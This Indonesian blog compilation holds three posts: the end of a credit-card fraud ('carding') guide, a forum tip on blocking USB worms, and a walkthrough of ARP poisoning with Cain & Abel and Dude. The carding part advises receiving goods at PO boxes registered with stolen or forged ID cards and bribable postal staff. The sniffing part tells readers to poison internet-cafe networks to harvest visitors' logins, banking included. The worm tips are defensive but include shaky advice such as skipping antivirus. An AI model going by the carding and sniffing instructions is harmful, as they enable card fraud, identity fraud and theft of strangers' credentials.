Jangan gunakan alamat pengiriman barang (shipping address) sama seperti alamat rumahmu atau alamat kantor kerjamu ! Paling aman adalah gunakan alamat PO. Box di kantor pos. Jadi sebelum melakukan praktek carding, terlebih dahulu anda harus mempunyai sebuah atau beberapa buah PO. Box di kantor pos (entah di kotamu atau di sebelah kotamu, di desa juga nggak apa-apa). Sebelum mendaftar menjadi anggota PO. Box di kantor pos tersebut, anda harus terlebih dahulu melakukan survey ke kantor pos tadi. Isi survey-nya adalah mengenai persyaratan untuk memiliki PO. Box, strategis tidaknya posisi PO.Box (bisa dijangkau dengan mudah tanpa masuk kantor), ramai tidaknya kantor pos tadi (ini penting sekali nantinya dalam pengambilan barang), tingkat intelegensi petugas kantor pos (bisa diajak kerja sama atau tidak nantinya), dan lain-lainnya. Untuk mendaftar PO.BOX, JANGAN PERNAH menggunakan KTP asli. Gunakan KTP ASPAL (asli tapi palsu), misalnya KTP-nya orang lain yang kecopetan, atau mungkin kamu minta KTP dari seorang copet yang merupakan teman kamu sehari-hari. Kamu bisa saja mendaftar dengan fotocopy KTP aspal tadi dengan alasan bahwa kamu disuruh kakak kamu untuk mendaftar PO. Box disitu dan KTP tadi adalah KTP kakak kamu. Apa lah alasannya, itu terserah kamu deh, gunakan imajinasimu sendiri. Pokoknya jangan pernah gunakan KTP asli kamu.

== Tips/Trik 3 ==

Jangan gunakan nomor telepon rumah atau kantor untuk berkomunikasi dalam carding, karena bisa dilacak alamat rumah atau kantormu tadi. Gunakan selalu nomor HP-mu !! Ingat bahwa untuk melakukan carding itu tidaklah instant (tidak semudah membalikkan telapak tangan), dalam melakukan carding ada banyak tantangan dan resiko yang harus di hadapi, dan disanalah letak seni carding-nya.

Artikel ini dibuat untuk tujuan pendidikan, penulis tidak betanggung jawab atas semua resiko yang akan di timbulkan. *JANGAN MAIN API JIKA TAKUT TERBAKAR (by: jembuat)

Tips Mencegah Masuknya Worm dari Flashdisk ke Komputer

di post oleh luv_lamerz pada pada forum jasakom disini

luv_lamerz wrote:

Tips Mencegah Masuknya Worm dari Flashdisk ke Komputer

Rating Artikel : Pemula, Intermediate, Advanced 8)

Akhir-akhir ini begitu banyak orang terserang Worm komputer, parahnya itu semua berasal dari flashdisk laknat yang telah tertulari Worm sebelumnya. Macam2 lah nama Wormnya, ada thumbs.db.com, ada smss.exe, alman, ah banyak deh, bikin kita naik pitam aja kalau kena tu Worm. Worm-Worm itu membuat file autorun.inf yang fungsinya ”membuat atau menambah isi dari context menu pada klik kanan drive seperti Auto, Open, Explorer,dll yang memerintahkan meng-eksekusi file Worm yang ada di flashdisk”. Nah.. Berikut tips-tips untuk mencegah hal tersebut terjadi ;

1. Biasakan membuka flashdisk lewat explorer, Klik kanan Start, lalu pilih Explore. Lalu untuk membuka Isi Flashdisk, Klik Drive Flashdisk, misalnya di tempat kamu driveletter Flasdisknya huruf E, maka klik kiri drive E: pada bagian kiri Windows (apa ya namanya??, yang ada + – nya), seketika akan tampil isi dari drive yang kita klik kiri tadi di bagian kanan Windows.

2. Jangan sekali-kali membuka flashdisk dengan cara mengklik 2 kali flashdisk tersebut
3. Membuka flashdisk dengan cara klik kanan>open, sekarang sudah tidak aman lagi, perintah open dan explorer bisa saja diganti oleh beberapa jenis Worm. So, gunakan langkah 1 untuk membuka flasdisk.
4. Search File dengan ekstensi *.exe ; *.scr ; *.com pada flashdisk.
Tahap Seacrhing :
- Klik Start
- Klik Search
- Klik All Files and Folders
- (pada textbox pertama isi dengan *.exe;*.scr;*.com sedangkan untuk textbox kedua biarkan kosong)
- Atur Look in nya ke driveletter Flasdisk kamu, misalnya E:
- Klik More Advanced Options, lalu Ceklist pada bagian Search System Folders, Search SubFolders, Search hidden Files and Folders
- Persiapan Search sudah selesai, tapi sebelum itu harus memunculkan Ekstensi dari File itu sendiri (default nya ekstensi tidak muncul). Hal tersebut akan berguna nantinya pada saat analisa. Langkah2nya :
# Klik Tools (pada bagian menu bar explorer), pilih Folder Options, Ambil tab View..
# Klik Opsi [b]Show Hidden Files and Folders
, Hilangkan Ceklist pada bagian ; 1. Hide Ekstension for known file types 2. Hide Protected operating system files
Note : Semua file nantinya akan terlihat ekstensinya, misalnya file gambar akan terlihat nama_file_gambar.jpg, Jika HIde Ekstensi nya kita ceklist lagi, maka file gambar akan terlihat namanya saja nama_file_gambar
# Klik Apply dan Ok.
- Persiapan untuk Analisa completed, sekarang klik Search.
- Jika ketemu, sekarang kita masuk tahap Analisa. ^^
Tahap Analisa :
- Setelah bermunculan file-file yang bertipe Aplikasi akibat tahap searching tadi, maka sekarang kita analisa aplikasi itu apakah Ia Worm atau bukan.
- Perhatikan Icon File, Jika icon ya berbentuk Folder, Text Document, Jpeg (file gambar), explorer, atau icon default windows lainnya , maka file tersebut pantas dicurigai sebagai worm.
- Filenya bernama : smss.exe, msconfig.exe, lsass.exe, winlogon.exe, svchost.exe, userinit.exe, csrss.exe, services.exe Kenapa dibilang mencurigakan?? Karena file2 tersebut merupakan file yang seharusnya berada di directory C:\WINDOWS\system32, aneh kan kok ada di flashdisk?. Selain itu biasanya worm menggunakan nama yang menantang untuk di klik, misalnya Jangan klik aku, klik di sini, foto XXX, video Miyabi New Hot, Skandal, Jekel, Crack , teknik yang mereka pakai di sini namanya Social Engineering. Mereka memanfaatkan sifat asli manusia, yaitu rasa ingin tau. Nah File yang termasuk kategori di atas pantas dicurigai.
- Ukuran file relatif kecil, Worm umumnya berukuran kecil (apalagi virus, bisa ukuran byte), biasanya worm berukuran dibawah 250 kb, kalau ukurannya lebih besar, berarti orang yang buat Worm itu baru coba2 dalam hal buat Worm (masih cupu, hahahaha, tapi kalo ukuran nya sampai 2 giga, wah salut dah sama yang buatnya,hehehe), ukuran Worm yang terlalu besar bisa menimbulkan kemungkinan bug yang besar juga. Kemudian urutkan kan lah file yang telah kita dapat melalui searching tadi dengan cara : klik kanan > arrange icons by Size. Kemudian pusatkan perhatian anda pada file yang berukuran antara 20 kb hingga 250 kb. Klasifikasikan file berdasarkan file yang pantas dicurigai tadi. Sampai tahap ini sebenarnya anda sudah bisa mendelete file yang pantas dicurigai tadi. Jika ingin menambah keyakinan anda ini worm atau bukan, lanjutkan bacaan anda. ^^
- File yang pantas dicurigai Punya ekstensi ganda (terkadang gak juga kok, ini cuma sebagai tambahan aja). Misalnya file Jekel in School.3gp.EXE Nah.. file Jekel in School sudah jelas menggunakan teknik Social Engineering, sang pembuat worm memanfaatkan sifat asli manusia, yaitu rasa ingin tau. Selain itu, yang perlu kita perhatikan di sini, file yang kita anggap 3gp (fake ekstension) memiliki ekstensi tambahan di belakangnya, yaitu Exe(real ekstension).
[i]Note : Inilah gunanya anda menghilangkan ceklist pada Hide Ekstension for known, agar ekstensi yang sesungguhnya itu muncul, jika anda tidak menghilangkan ceklist pada Hide Ekstension for known, maka yang terlihat adalah Jekel in School.3gp, ditambah pula worm nya ber-icon 3gp menambah keyakinan anda bahwa ini bukan worm, nonton dulu ah… Dasar… yang kayak gini ne sasaran empuk worm

Tapi, ada tapinya ne, terkadang worm ogah make fake ekstension, jadi ia langsung aja pake ekstensi exe tanpa ada tambahan fake ekstension, jadi gak usah sampai tahap ini juga gak papa. Anda sudah bisa delete file yang pantas dicurigai di langkah sebelumnya.
- Langkah terakhir, cari file dengan nama autorun.inf (file ini yang menyebabkan kita tidak boleh asal klik 2 kali pada flashdisk). Jika ketemu langsung delete, ga usah basa-basi.

5. Sekarang buka notepad, isi dengan kata-kata yang kamu suka, misalnya “Ardall cakep deh…. ^^, jadi virus jangan masuk ke flashdisk ini ya!! Plzzzz (gak ada hubungannya kale) “, lalu save file dengan nama Autorun.inf, lalu ubah Save as Types nya jadi All Files. Save file ini di Flashdisk anda, dibagian terdepan (singkatnya bukan di dalam folder).
Lalu ubah attribut file nya menjadi System, Read-Only, Hidden. Caranya???
Buka Command Prompt…. Caranya???
Oh My God…
- Klik Start, klik Run, Ketik CMD, maka Command Prompt akan muncul.
- Langsung ketik dengan penuh semangat cd /d huruf_flashdisk: kalo flashdisk kamu ada pada huruf F, maka :
cd /d F:
- ketik lagi dengan penuh hati-hati (ingat… hati-hati)
attrib +r +s +h autorun.inf
- #Selesai#
6. Edit Registry supaya Windows memblock eksekusi aplikasi dengan nama tertentu. (nama-nama yang biasa dipake worm, jangan isi dengan nama seperti smss.exe, coz itu kan program windows asli)
Nama-nama umum virus atau worm : New Folder.exe, Flu Burung.exe, Kangen.exe, Puisi.exe, MyHeart.exe, tambahlah data nama2 virus ini setiap anda terkena virus dan worm. Kemudian buka Regedit :
- Klik Start, klik Run, ketik REgedit
- Cari key berikut : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
- Setelah ketemu, buat key baru, klik kanan pada key Policies ,lalu pilih new > Key
- Rename menjadi Explorer
- Buat key baru lagi di bawah Explorer, klik kanan pada Explorer, klik New > Key
- Rename menjadi DisAllowRun
- Pindah ke bagian kanan, klik kanan di sana, lalu pilih new > string value
- Rename menjadi 1, klik 2 kali, lalu ubah Value Datanya menjadi nama-nama umum virus atau worm yang telah disebutkan diatas (ingat jangan isi dengan nama aplikasi asli windows, seperti smss.exe, winlogon.exe, system.exe, svchost.exe)
- isi dengan Kangen.exe (satu data, 1 value, jadi buat string value lagi untuk memasukkan nama-nama yang lain, tapi dengan syarat namanya menjadi 2,3,4,5 dan seterusnya.

7. Hal terakhir yang perlu dilakukan untuk mencegah Worm yang dibuat dari VB jalan di komputer kita (sangat ampuh loh), adalah dengan merename file MSVBVM60.dll yang terletak di :
C:\WINDOWS\SYSTEM32\MSVBVM60.DLL
Terserah mau di rename dengan nama apa, kalau saya sih dengan nama msvbvm60.dllx
(file ini tidak akan bisa di-rename kalo ada aplikasi/program yang dibuat dari VB sedang jalan, jadi jika anda sedang terinfeksi worm yang dibuat dengan VB *rata-rata sih Worm lokal dibuat dari VB* , maka jangan berharap file ini bisa di-rename, bahkan msvbvm60.dll itu di-ilanginnya)
Lalu gimana dong?????? Tenang… ini kan artikel tentang pencegahan… hehehe… Baca Artikel saya tentang pembasmiannya….

Nah… Dengan mengikuti langkah-langkah tersebut, sepertinya anda tidak perlu lagi antivirus , yak an??? Saya aja gak pake antivirus, bikin berat komputer aja, apalagi waktu maen Warcraft, tapi kalo mau pake antivirus juga pake aja McAfee. Menurut gua lagi nih ;

1. Karspersky Anti virus
Kelebihan : Top Abis, The Best Antivirus, bisa membersihkan file exe yang terinfeksi Worm (bukan worm sih, tapi setengah worm setengah virus) atau virus
Kekurangan : Makan Resource computer terlalu banyak, Berat, Update nya susah, Mesti pake Aktivasi2, ribet dah…
2. PCMAV (bagus juga, cinta produk dalam negeri)
Kelebihan : Ampuh untuk worm atau Worm lokal, bisa membersihkan file exe yang terinfeksi Worm (meski ga semua)
Kekurangan : Masih ada bug, berat kalau RTP (Real Time Protector) nya hidup, masih pake caption pada window nya, jadi gampang di kill ma virus kalo PCMAV lagi jalan.
3. McAfee
Kelebihan : Bagus untuk Worm lokal dan interlokal (loh kok interlokal??)
Kekurangan : Kalau salah update, McAfee nya ga bisa dipake lagi loh, meskipun dinstal berulang kali
4. AVG
Kelebihan : Ringan, Cepat
Kekurangan : Maen Delete Ja… (Sialan ne AV, tidak berprikemanusian).. Aplikasi gua yang kena Worm bukan di Heal, tapi di-delete.
5 Norton
Kelebihan : Bagus.. baguss… dan baguss….gampang updatenya…
Kekurangan : Berat.. berat.. dan berat….

Hmmm…. Sekian saja tutorial kali ini…
Mudah2an ada gunanya….
Amin..

Kalo ada pertanyaan, silahkan….

melihat password (sniffing) dengan cain + dude

tulisan ini dipost oleh http://bestfuture.wordpress.com

Tulisan ini hasil karya 4L13N membahas tehnik poisoning/Spoofing dengan melakukan penipuan terhadap komputer target melalui mac address komputer gateway, sehingga kita akan mencoba menipu komputer target agar percaya bahwa mac addres komputer gateaway adalah mac addres komputer yang kita pakai, jadi semua data yang dikirim komputer target akan melewati komputer kita terlebih dahulu. Dengan tehnik ini kita bisa mencuri username dan password, ftp,http,imap,pop3,smb,telnet,vnc,tds,icq,mysql,dll atau bahkan pada situs yang secure sekalipun, yang kebanyakan diawali dengan Https, ex:yahoo mail,internet banking. Mantab kan cukup pake cain & abel dan jalankan programnya , kalo yang dijelasin di sini cuma untuk warnet yang pake HUB, kalo yang pake SWITCH tidak mempan.

Terus Uba rampe yang dibutuhkan apa saja ya. Misalnya warnet dengan pengunjung yang rame, bisa pakai Wi-fi/hotspot (yups… karna disini kita melakukan snifer terhadap pengunjung warnet yang melakukan login untuk mendapatkan username N password). Setelah itu download Dude 2.1 Cari di abang Google aplikasi untuk memonitor network, agar kita tahu pc yang aktif dijaringan, sekalian untuk melakukan komunikasi dengan seluruh jaringan yang ada. Software Cain N Abel versi terserah Cari di www.oxid.it ato googling ajee… Nah ini dia senjata untuk snifer kita kali ini… saat tulisan ini dibuat penulis memakai versi terbaru yang baru di rilis yaitu. V.4.9.4

Setelah semuanya siap dan telah terinstal jalankan Dude 1.2 kemudian discover Network dan programpun akan menampilkan PC yang aktif saat itu lengkap dengan IP address-nya. Lalu jalankan program Cain N Abel, jangan lupa pilih ethernet card yang dipakai pada bagian configure, start sniffer, klik tab sniffer pada bagian host disana terlihat beberapa komputer lengkap dengan alamat IP N mac adress-nya, bingung, program cain tahu dari mana?. Program Cain mengetahui alamat tersebut melalui komunikasi yang dilakukan oleh program Dude, sebenarnya pake Ping juga bisa>>-A (Atau bisa juga dengan klik kanan pilih scan mac addres klik ok.) Kemudian klik pada tab APR bagian bawah, lalu klik gambar tanda tambah pada bagian atas pilih salah satu ato semua alamat IP address yang akan ditipu/diracuni klik OK dan Start apr.
Setelah semuanya selesai poisoning akan dilancarkan dan kita tinggal menunggu memanen password N username sambil chating dan minum KOPI Tubruk. untuk melihat hasil kerja program cain tinggal klik APR ato Passwords pada bagian bawah. Bisa lihat Image demonya dibawah ini :

cain+abel